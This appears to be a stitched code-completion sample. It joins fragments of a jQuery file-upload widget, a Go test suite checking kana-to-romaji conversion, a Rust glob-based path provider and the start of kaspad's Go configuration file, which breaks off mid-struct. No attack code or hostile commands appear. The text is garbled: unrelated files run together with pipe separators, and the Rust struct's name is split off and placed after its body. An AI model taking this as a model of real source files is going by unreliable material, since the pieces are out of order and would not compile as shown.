this._on(fileUploadButtonBar.find('.delete'), {
click: function (e) {
e.preventDefault();
filesList
.find('.toggle:checked')
.closest('.template-download')
.find('.delete')
.click();
fileUploadButtonBar.find('.toggle').prop('checked', false);
}
});
this._on(fileUploadButtonBar.find('.toggle'), {
change: function (e) {
filesList
.find('.toggle')
.prop('checked', $(e.currentTarget).is(':checked'));
}
});
},
_destroyButtonBarEventHandlers: function () {
this._off(
this.element
.find('.fileupload-buttonbar')
.find('.start, .cancel, .delete'),
'click'
);
this._off(this.element.find('.fileupload-buttonbar .toggle'), 'change.');
},
_initEventHandlers: function () {
this._super();
this._on(this.options.filesContainer, {
'click .edit': this._editHandler,
'click .start': this._startHandler,
'click .cancel': this._cancelHandler,
'click .delete': this._deleteHandler
});
this._initButtonBarEventHandlers();
},
_destroyEventHandlers: function () {
this._destroyButtonBarEventHandlers();
this._off(this.options.filesContainer, 'click');
this._super();
},
_enableFileInputButton: function () {
this.element
.find('.fileinput-button input')
.prop('disabled', false)
.parent()
.removeClass('disabled');
},
_disableFileInputButton: function () {
this.element
.find('.fileinput-button input')
.prop('disabled', true)
.parent()
.addClass('disabled');
},
_initTemplates: function () {
var options = this.options;
options.templatesContainer = this.document[0].createElement(
options.filesContainer.prop('nodeName')
);
if (tmpl) {
if (options.uploadTemplateId) {
options.uploadTemplate = tmpl(options.uploadTemplateId);
}
if (options.downloadTemplateId) {
options.downloadTemplate = tmpl(options.downloadTemplateId);
}
}
},
_initFilesContainer: function () {
var options = this.options;
if (options.filesContainer === undefined) {
options.filesContainer = this.element.find('.files');
} else if (!(options.filesContainer instanceof $)) {
options.filesContainer = $(options.filesContainer);
}
},
_initSpecialOptions: function () {
this._super();
this._initFilesContainer();
this._initTemplates();
},
_create: function () {
this._super();
this._resetFinishedDeferreds();
if (!$.support.fileInput) {
this._disableFileInputButton();
}
},
enable: function () {
var wasDisabled = false;
if (this.options.disabled) {
wasDisabled = true;
}
this._super();
if (wasDisabled) {
this.element.find('input, button').prop('disabled', false);
this._enableFileInputButton();
}
},
disable: function () {
if (!this.options.disabled) {
this.element.find('input, button').prop('disabled', true);
this._disableFileInputButton();
}
this._super();
}
});
});
|
.attr('aria-valuenow', progress)
.children()
|
kanaToRomaji_test.go
|
package kanaconv
import (
"testing"
"github.com/stretchr/testify/assert"
)
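// inp pairs a kana input with the romaji string expected from KanaToRomaji.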
type inp struct {
input string
want string
}
func TestBasic(t *testing.T) {
const want = "aiueon"
for _, v := range [2]string{"あいうえおん", "アイウエオン"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestBasicDakuten(t *testing.T) {
const want = "vu"
for _, v := range [2]string{"ゔ", "ヴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestK(t *testing.T) {
const want = "kakikukeko"
for _, v := range [2]string{"かきくけこ", "カキクケコ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestKDakuten(t *testing.T) {
const want = "gagigugego"
for _, v := range [2]string{"がぎぐげご", "ガギグゲゴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestS(t *testing.T) {
const want = "sashisuseso"
for _, v := range [2]string{"さしすせそ", "サシスセソ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSDakuten(t *testing.T) {
const want = "zajizuzezo"
for _, v := range [2]string{"ざじずぜぞ", "ザジズゼゾ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestT(t *testing.T) {
const want = "tachitsuteto"
for _, v := range [2]string{"たちつてと", "タチツテト"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestTDakuten(t *testing.T) {
const want = "dajizudedo"
for _, v := range [2]string{"だじづでど", "ダジヅデド"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestN(t *testing.T) {
const want = "naninuneno"
for _, v := range [2]string{"なにぬねの", "ナニヌネノ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestH(t *testing.T) {
const want = "hahifuheho"
for _, v := range [2]string{"はひふへほ", "ハヒフヘホ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestHDakutenB(t *testing.T) {
const want = "babibubebo"
for _, v := range [2]string{"ばびぶべぼ", "バビブベボ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestHDakutenP(t *testing.T) {
const want = "papipupepo"
for _, v := range [2]string{"ぱぴぷぺぽ", "パピプペポ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
|
}
}
func TestM(t *testing.T) {
const want = "mamimumemo"
for _, v := range [2]string{"まみむめも", "マミムメモ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestY(t *testing.T) {
const want = "yayuyo"
for _, v := range [2]string{"やゆよ", "ヤユヨ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestR(t *testing.T) {
const want = "rarirurero"
for _, v := range [2]string{"らりるれろ", "ラリルレロ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestW(t *testing.T) {
const want = "wawiwewo"
for _, v := range [2]string{"わゐゑを", "ワヰヱヲ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonInvalid(t *testing.T) {
const want = "yōon cannot be the first character in a kana block"
input := []string{
"ゃき", "ゅき", "ょき", "ぁき", "ぃき", "ぅき", "ぇき", "ぉき", "ゎき",
"ャキ", "ュキ", "ョキ", "ァキ", "ィキ", "ゥキ", "ェキ", "ォキ", "ヮキ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.Empty(t, got)
assert.EqualError(t, err, want)
}
}
func TestYouonSpecialInvalid(t *testing.T) {
const want = "unrecognised yōon vowel"
input := []string{
"あぃ", "えぃ", "おぃ",
"アィ", "エィ", "オィ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.Empty(t, got)
assert.EqualError(t, err, want)
}
}
func TestYouonI(t *testing.T) {
const want = "ye"
for _, v := range [2]string{"いぇ", "イェ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonU(t *testing.T) {
const want = "wiwe"
for _, v := range [2]string{"うぃうぇ", "ウィウェ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonV(t *testing.T) {
const want = "vyavyuvyovavivuvevo"
for _, v := range [2]string{"ゔゃゔゅゔょゔぁゔぃゔぅゔぇゔぉ", "ヴャヴュヴョヴァヴィヴゥヴェヴォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonK(t *testing.T) {
const want = "kyakyukyokyakyikyukyekyo"
for _, v := range [2]string{"きゃきゅきょきぁきぃきぅきぇきぉ", "キャキュキョキァキィキゥキェキォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonKSpecial(t *testing.T) {
const want = "kakikukekokwaki"
for _, v := range [2]string{"くぁくぃくぅくぇくぉくゎけぃ", "クァクィクゥクェクォクヮケィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonG(t *testing.T) {
const want = "gyagyugyogyagyigyugyegyo"
for _, v := range [2]string{"ぎゃぎゅぎょぎぁぎぃぎぅぎぇぎぉ", "ギャギュギョギァギィギゥギェギォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonGSpecial(t *testing.T) {
const want = "gagigugegogwagi"
for _, v := range [2]string{"ぐぁぐぃぐぅぐぇぐぉぐゎげぃ", "グァグィグゥグェグォグヮゲィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonS(t *testing.T) {
const want = "shashushoshashishushesho"
for _, v := range [2]string{"しゃしゅしょしぁしぃしぅしぇしぉ", "シャシュショシァシィシゥシェシォ"} {
got, _ := KanaToRomaji(v)
assert.Equal(t, want, got)
}
}
func TestYouonSSpecial(t *testing.T) {
const want = "sasisusesoswasi"
for _, v := range [2]string{"すぁすぃすぅすぇすぉすゎせぃ", "スァスィスゥスェスォスヮセィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonZ(t *testing.T) {
const want = "jajujojajijujejo"
for _, v := range [2]string{"じゃじゅじょじぁじぃじぅじぇじぉ", "ジャジュジョジァジィジゥジェジォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonZSpecial(t *testing.T) {
const want = "zazizuzezozwazi"
for _, v := range [2]string{"ずぁずぃずぅずぇずぉずゎぜぃ", "ズァズィズゥズェズォズヮゼィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonT(t *testing.T) {
const want = "chachuchochachichuchecho"
for _, v := range [2]string{"ちゃちゅちょちぁちぃちぅちぇちぉ", "チャチュチョチァチィチゥチェチォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonTSpecial(t *testing.T) {
const want = "tsatsitsutsetsotswatityutu"
for _, v := range [2]string{"つぁつぃつぅつぇつぉつゎてぃてゅとぅ", "ツァツィツゥツェツォツヮティテュトゥ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonDSpecial(t *testing.T) {
const want = "zazizuzezozwadidyudu"
for _, v := range [2]string{"づぁづぃづぅづぇづぉづゎでぃでゅどぅ", "ヅァヅィヅゥヅェヅォヅヮディデュドゥ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonN(t *testing.T) {
const want = "nyanyunyonyanyinyunyenyo"
for _, v := range [2]string{"にゃにゅにょにぁにぃにぅにぇにぉ", "ニャニュニョニァニィニゥニェニォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonNSpecial(t *testing.T) {
const want = "naninunenonwani"
for _, v := range [2]string{"ぬぁぬぃぬぅぬぇぬぉぬゎねぃ", "ヌァヌィヌゥヌェヌォヌヮネィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonH(t *testing.T) {
const want = "hyahyuhyohyahyihyuhyehyo"
for _, v := range [2]string{"ひゃひゅひょひぁひぃひぅひぇひぉ", "ヒャヒュヒョヒァヒィヒゥヒェヒォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonHSpecial(t *testing.T) {
const want = "fafifufefofwafyuhi"
for _, v := range [2]string{"ふぁふぃふぅふぇふぉふゎふゅへぃ", "ファフィフゥフェフォフヮフュヘィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonB(t *testing.T) {
const want = "byabyubyobyabyibyubyebyo"
for _, v := range [2]string{"びゃびゅびょびぁびぃびぅびぇびぉ", "ビャビュビョビァビィビゥビェビォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonBSpecial(t *testing.T) {
const want = "babibubebobwabyubi"
for _, v := range [2]string{"ぶぁぶぃぶぅぶぇぶぉぶゎぶゅべぃ", "ブァブィブゥブェブォブヮブュベィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonP(t *testing.T) {
const want = "pyapyupyopyapyipyupyepyo"
for _, v := range [2]string{"ぴゃぴゅぴょぴぁぴぃぴぅぴぇぴぉ", "ピャピュピョピァピィピゥピェピォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonPSpecial(t *testing.T) {
const want = "papipupepopwapyupi"
for _, v := range [2]string{"ぷぁぷぃぷぅぷぇぷぉぷゎぷゅぺぃ", "プァプィプゥプェプォプヮプュペィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonM(t *testing.T) {
const want = "myamyumyomyamyimyumyemyo"
for _, v := range [2]string{"みゃみゅみょみぁみぃみぅみぇみぉ", "ミャミュミョミァミィミゥミェミォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonMSpecial(t *testing.T) {
const want = "mamimumemomwamyumi"
for _, v := range [2]string{"むぁむぃむぅむぇむぉむゎむゅめぃ", "ムァムィムゥムェムォムヮムュメィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonYSpecial(t *testing.T) {
const want = "yayiyuyeyoywa"
for _, v := range [2]string{"ゆぁゆぃゆぅゆぇゆぉゆゎ", "ユァユィユゥユェユォユヮ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonR(t *testing.T) {
const want = "ryaryuryoryaryiryuryeryo"
for _, v := range [2]string{"りゃりゅりょりぁりぃりぅりぇりぉ", "リャリュリョリァリィリゥリェリォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonRSpecial(t *testing.T) {
const want = "rarirurerorwaryuri"
for _, v := range [2]string{"るぁるぃるぅるぇるぉるゎるゅれぃ", "ルァルィルゥルェルォルヮルュレィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonWSpecial(t *testing.T) {
const want = "wa"
for _, v := range [2]string{"わぁ", "ワァ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestPunctuationMark(t *testing.T) {
const want = "jiendo"
got, err := KanaToRomaji("ジ・エンド")
assert.Equal(t, want, got)
assert.Nil(t, err)
}
func TestSokuonInvalid(t *testing.T) {
const want = "sokuon cannot precede a vowel"
input := []string{
"っあ", "っい", "っう", "っえ", "っお",
"ッア", "ッイ", "ッウ", "ッエ", "ッオ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.EqualError(t, err, want)
assert.Empty(t, got)
}
}
func TestSokuon(t *testing.T) {
const want = "nn"
for _, v := range []string{"っん", "ッン"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonK(t *testing.T) {
const want = "kkakkikkukkekko"
for _, v := range []string{"っかっきっくっけっこ", "ッカッキックッケッコ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonG(t *testing.T) {
const want = "ggaggigguggeggo"
for _, v := range []string{"っがっぎっぐっげっご", "ッガッギッグッゲッゴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonS(t *testing.T) {
const want = "ssasshissussesso"
for _, v := range []string{"っさっしっすっせっそ", "ッサッシッスッセッソ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonZ(t *testing.T) {
const want = "zzajjizzuzzezzo"
for _, v := range []string{"っざっじっずっぜっぞ", "ッザッジッズッゼッゾ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonT(t *testing.T) {
const want = "ttatchittsuttetto"
for _, v := range []string{"ったっちっつってっと", "ッタッチッツッテット"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonD(t *testing.T) {
const want = "ddajjizzuddeddo"
for _, v := range []string{"っだっぢっづっでっど", "ッダッヂッヅッデッド"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonN(t *testing.T) {
const want = "nnanninnunnenno"
for _, v := range []string{"っなっにっぬっねっの", "ッナッニッヌッネッノ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonH(t *testing.T) {
const want = "hhahhiffuhhehho"
for _, v := range []string{"っはっひっふっへっほ", "ッハッヒッフッヘッホ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonB(t *testing.T) {
const want = "bbabbibbubbebbo"
for _, v := range []string{"っばっびっぶっべっぼ", "ッバッビッブッベッボ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonP(t *testing.T) {
const want = "ppappippuppeppo"
for _, v := range []string{"っぱっぴっぷっぺっぽ", "ッパッピップッペッポ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonM(t *testing.T) {
const want = "mmammimmummemmo"
for _, v := range []string{"っまっみっむっめっも", "ッマッミッムッメッモ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonY(t *testing.T) {
const want = "yyayyuyyo"
for _, v := range []string{"っやっゆっよ", "ッヤッユッヨ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonR(t *testing.T) {
const want = "rrarrirrurrerro"
for _, v := range []string{"っらっりっるっれっろ", "ッラッリッルッレッロ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonW(t *testing.T) {
const want = "wwawwo"
for _, v := range []string{"っわっを", "ッワッヲ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestChouonpuA(t *testing.T) {
input := []inp{
{input: "アー", want: "aa"},
{input: "カーカ", want: "kaaka"},
{input: "キャーカ", want: "kyaaka"},
{input: "ガーカ", want: "gaaka"},
{input: "ギャーカ", want: "gyaaka"},
{input: "サーカ", want: "saaka"},
{input: "シャーカ", want: "shaaka"},
{input: "ザーカ", want: "zaaka"},
{input: "ジャーカ", want: "jaaka"},
{input: "ターカ", want: "taaka"},
{input: "チャーカ", want: "chaaka"},
{input: "ダーカ", want: "daaka"},
{input: "ヂャーカ", want: "jaaka"},
{input: "ナーカ", want: "naaka"},
{input: "ニャーカ", want: "nyaaka"},
{input: "ハーカ", want: "haaka"},
{input: "ヒャーカ", want: "hyaaka"},
{input: "バーカ", want: "baaka"},
{input: "ビャーカ", want: "byaaka"},
{input: "パーカ", want: "paaka"},
{input: "ピャーカ", want: "pyaaka"},
{input: "マーカ", want: "maaka"},
{input: "ミャーカ", want: "myaaka"},
{input: "ヤーカ", want: "yaaka"},
{input: "ラーカ", want: "raaka"},
{input: "リャーカ", want: "ryaaka"},
{input: "ワーカ", want: "waaka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuI(t *testing.T) {
input := []inp{
{input: "イー", want: "ii"},
{input: "キーカ", want: "kiika"},
{input: "キィーカ", want: "kyiika"},
{input: "ギーカ", want: "giika"},
{input: "ギィーカ", want: "gyiika"},
{input: "シーカ", want: "shiika"},
{input: "シィーカ", want: "shiika"},
{input: "ジーカ", want: "jiika"},
{input: "ジィーカ", want: "jiika"},
{input: "チーカ", want: "chiika"},
{input: "チィーカ", want: "chiika"},
{input: "ヂーカ", want: "jiika"},
{input: "ヂィーカ", want: "jiika"},
{input: "ニーカ", want: "niika"},
{input: "ニィーカ", want: "nyiika"},
{input: "ヒーカ", want: "hiika"},
{input: "ヒィーカ", want: "hyiika"},
{input: "ビーカ", want: "biika"},
{input: "ビィーカ", want: "byiika"},
{input: "ピーカ", want: "piika"},
{input: "ピィーカ", want: "pyiika"},
{input: "ミーカ", want: "miika"},
{input: "ミィーカ", want: "myiika"},
{input: "リーカ", want: "riika"},
{input: "リィーカ", want: "ryiika"},
{input: "ヰーカ", want: "wiika"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuU(t *testing.T) {
input := []inp{
{input: "ウー", want: "uu"},
{input: "クーカ", want: "kuuka"},
{input: "キューカ", want: "kyuuka"},
{input: "グーカ", want: "guuka"},
{input: "ギューカ", want: "gyuuka"},
{input: "スーカ", want: "suuka"},
{input: "シューカ", want: "shuuka"},
{input: "ズーカ", want: "zuuka"},
{input: "ジューカ", want: "juuka"},
{input: "ツーカ", want: "tsuuka"},
{input: "チューカ", want: "chuuka"},
{input: "ヅーカ", want: "zuuka"},
{input: "ヂューカ", want: "juuka"},
{input: "ヌーカ", want: "nuuka"},
{input: "ニューカ", want: "nyuuka"},
{input: "フーカ", want: "fuuka"},
{input: "ヒューカ", want: "hyuuka"},
{input: "ブーカ", want: "buuka"},
{input: "ビューカ", want: "byuuka"},
{input: "プーカ", want: "puuka"},
{input: "ピューカ", want: "pyuuka"},
{input: "ムーカ", want: "muuka"},
{input: "ミューカ", want: "myuuka"},
{input: "ユーカ", want: "yuuka"},
{input: "ルーカ", want: "ruuka"},
{input: "リューカ", want: "ryuuka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuE(t *testing.T) {
input := []inp{
{input: "エー", want: "ee"},
{input: "ケーカ", want: "keeka"},
{input: "キェーカ", want: "kyeeka"},
{input: "ゲーカ", want: "geeka"},
{input: "ギェーカ", want: "gyeeka"},
{input: "セーカ", want: "seeka"},
{input: "シェーカ", want: "sheeka"},
{input: "ゼーカ", want: "zeeka"},
{input: "ジェーカ", want: "jeeka"},
{input: "テーカ", want: "teeka"},
{input: "チェーカ", want: "cheeka"},
{input: "デーカ", want: "deeka"},
{input: "ヂェーカ", want: "jeeka"},
{input: "ネーカ", want: "neeka"},
{input: "ニェーカ", want: "nyeeka"},
{input: "ヘーカ", want: "heeka"},
{input: "ヒェーカ", want: "hyeeka"},
{input: "ベーカ", want: "beeka"},
{input: "ビェーカ", want: "byeeka"},
{input: "ペーカ", want: "peeka"},
{input: "ピェーカ", want: "pyeeka"},
{input: "メーカ", want: "meeka"},
{input: "ミェーカ", want: "myeeka"},
{input: "レーカ", want: "reeka"},
{input: "リェーカ", want: "ryeeka"},
{input: "ヱーカ", want: "weeka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuO(t *testing.T) {
input := []inp{
{input: "オー", want: "oo"},
{input: "コーカ", want: "kooka"},
{input: "キョーカ", want: "kyooka"},
{input: "ゴーカ", want: "gooka"},
{input: "ギョーカ", want: "gyooka"},
{input: "ソーカ", want: "sooka"},
{input: "ショーカ", want: "shooka"},
{input: "ゾーカ", want: "zooka"},
{input: "ジョーカ", want: "jooka"},
{input: "トーカ", want: "tooka"},
{input: "チョーカ", want: "chooka"},
{input: "ドーカ", want: "dooka"},
{input: "ヂョーカ", want: "jooka"},
{input: "ノーカ", want: "nooka"},
{input: "ニョーカ", want: "nyooka"},
{input: "ホーカ", want: "hooka"},
{input: "ヒョーカ", want: "hyooka"},
{input: "ボーカ", want: "booka"},
{input: "ビョーカ", want: "byooka"},
{input: "ポーカ", want: "pooka"},
{input: "ピョーカ", want: "pyooka"},
{input: "モーカ", want: "mooka"},
{input: "ミョーカ", want: "myooka"},
{input: "ローカ", want: "rooka"},
{input: "リョーカ", want: "ryooka"},
{input: "ヲーカ", want: "wooka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestNonKanaCharacters(t *testing.T) {
inputs := []string{
"日本",
"English",
}
for _, input := range inputs {
got, err := KanaToRomaji(input)
assert.Empty(t, got)
assert.NotNil(t, err)
}
}
| |
glob.rs
|
use crate::provider::Provider;
use glob::Pattern;
use std::path::PathBuf;
/// A glob-based path provider
///
/// Provides the paths to the files on the file system that
/// match the include patterns and don't match the exclude patterns.
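///
/// # Example
///
/// A usage sketch (not compiled here; assumes `Glob` and the `Provider`
/// trait are in scope):
///
/// ```ignore
/// use std::path::PathBuf;
///
/// let includes = vec![PathBuf::from("src/**/*.rs")];
/// let excludes = vec![PathBuf::from("target/**")];
/// let glob = Glob::new(&includes, &excludes).expect("valid patterns");
/// let paths = glob.scan();
/// ```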
pub struct
|
{
includes: Vec<String>,
excludes: Vec<Pattern>,
}
impl Glob {
/// Create a new [`Glob`]
///
/// Returns `None` if patterns aren't valid
pub fn new(includes: &[PathBuf], excludes: &[PathBuf]) -> Option<Self> {
let includes = includes
.iter()
.map(|path| path.to_str().map(ToOwned::to_owned))
.collect::<Option<_>>()?;
        let excludes = excludes
            .iter()
            .flat_map(|path| path.to_str().map(|path| Pattern::new(path).ok()))
            .collect::<Option<_>>()?;
Some(Self { includes, excludes })
}
}
impl Provider for Glob {
fn scan(&self) -> Vec<PathBuf> {
self.includes
.iter()
.flat_map(|include| {
glob::glob(include.as_str())
.expect("failed to read flob pattern")
.flat_map(|result| result.ok())
})
.filter(|candidate: &PathBuf| -> bool {
!self.excludes.iter().any(|pattern| {
let s = candidate.to_str().unwrap();
pattern.matches(s)
})
})
.collect()
}
}
|
Glob
|
config.go
|
// Copyright (c) 2013-2017 The btcsuite developers
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package config
import (
// _ "embed" is necessary for the go:embed feature.
_ "embed"
"fmt"
"net"
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"time"
"github.com/btcsuite/go-socks/socks"
"github.com/jessevdk/go-flags"
"github.com/kaspanet/kaspad/domain/consensus/model/externalapi"
"github.com/kaspanet/kaspad/domain/dagconfig"
"github.com/kaspanet/kaspad/infrastructure/logger"
"github.com/kaspanet/kaspad/util"
"github.com/kaspanet/kaspad/util/network"
"github.com/kaspanet/kaspad/version"
"github.com/pkg/errors"
)
const (
defaultConfigFilename = "kaspad.conf"
defaultLogLevel = "info"
defaultLogDirname = "logs"
defaultLogFilename = "kaspad.log"
defaultErrLogFilename = "kaspad_err.log"
defaultTargetOutboundPeers = 8
defaultMaxInboundPeers = 117
defaultBanDuration = time.Hour * 24
defaultBanThreshold = 100
	// DefaultConnectTimeout is the default connection timeout when dialing
DefaultConnectTimeout = time.Second * 30
defaultMaxRPCClients = 10
defaultMaxRPCWebsockets = 25
defaultMaxRPCConcurrentReqs = 20
defaultBlockMaxMass = 10000000
blockMaxMassMin = 1000
blockMaxMassMax = 10000000
defaultMinRelayTxFee = 1e-5 // 1 sompi per byte
defaultMaxOrphanTransactions = 100
	// DefaultMaxOrphanTxSize is the default maximum size for an orphan transaction
DefaultMaxOrphanTxSize = 100000
defaultSigCacheMaxSize = 100000
sampleConfigFilename = "sample-kaspad.conf"
defaultMaxUTXOCacheSize = 5000000000
)
var (
// DefaultAppDir is the default home directory for kaspad.
DefaultAppDir = util.AppDir("kaspad", false)
defaultConfigFile = filepath.Join(DefaultAppDir, defaultConfigFilename)
defaultDataDir = filepath.Join(DefaultAppDir)
defaultRPCKeyFile = filepath.Join(DefaultAppDir, "rpc.key")
defaultRPCCertFile = filepath.Join(DefaultAppDir, "rpc.cert")
)
//go:embed sample-kaspad.conf
var sampleConfig string
// RunServiceCommand is only set to a real function on Windows. It is used
// to parse and execute service commands specified via the -s flag.
var RunServiceCommand func(string) error
// Flags defines the configuration options for kaspad.
//
// See loadConfig for details on the configuration load process.
type Flags struct {
ShowVersion bool `short:"V" long:"version" description:"Display version information and exit"`
ConfigFile string `short:"C" long:"configfile" description:"Path to configuration file"`
AppDir string `short:"b" long:"appdir" description:"Directory to store data"`
LogDir string `long:"logdir" description:"Directory to log output."`
AddPeers []string `short:"a" long:"addpeer" description:"Add a peer to connect with at startup"`
ConnectPeers []string `long:"connect" description:"Connect only to the specified peers at startup"`
DisableListen bool `long:"nolisten" description:"Disable listening for incoming connections -- NOTE: Listening is automatically disabled if the --connect or --proxy options are used without also specifying listen interfaces via --listen"`
Listeners []string `long:"listen" description:"Add an interface/port to listen for connections (default all interfaces port: 16111, testnet: 16211)"`
TargetOutboundPeers int `long:"outpeers" description:"Target number of outbound peers"`
MaxInboundPeers int `long:"maxinpeers" description:"Max number of inbound peers"`
EnableBanning bool `long:"enablebanning" description:"Enable banning of misbehaving peers"`
BanDuration time.Duration `long:"banduration" description:"How long to ban misbehaving peers. Valid time units are {s, m, h}. Minimum 1 second"`
BanThreshold uint32 `long:"banthreshold" description:"Maximum allowed ban score before disconnecting and banning misbehaving peers."`
Whitelists []string `long:"whitelist" description:"Add an IP network or IP that will not be banned. (eg. 192.168.1.0/24 or ::1)"`
RPCListeners []string `long:"rpclisten" description:"Add an interface/port to listen for RPC connections (default port: 16110, testnet: 16210)"`
RPCCert string `long:"rpccert" description:"File containing the certificate file"`
RPCKey string `long:"rpckey" description:"File containing the certificate key"`
RPCMaxClients int `long:"rpcmaxclients" description:"Max number of RPC clients for standard connections"`
RPCMaxWebsockets int `long:"rpcmaxwebsockets" description:"Max number of RPC websocket connections"`
